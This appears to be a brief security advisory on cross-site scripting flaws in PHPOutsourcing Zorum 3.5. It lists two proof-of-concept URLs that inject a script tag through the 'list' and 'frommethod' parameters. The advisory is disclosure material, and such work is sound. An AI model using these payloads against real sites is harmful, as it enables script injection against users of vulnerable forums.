PHPOutsourcing Zorum Multiple Remote Vulnerabilities

PHPOutsourcing Zorum Multiple Remote Vulnerabilities

No exploit is required to leverage any of these issues. The following proof of concepts have been made available:

To carry out cross-site scripting attacks:
http://www.example.com/zorum_3_5/index.php?list="/><script>alert()</script>
http://www.example.com/zorum_3_5/index.php?method=markread&list=zorumuser&fromlist=secmenu&frommethod="/><script>alert()</script>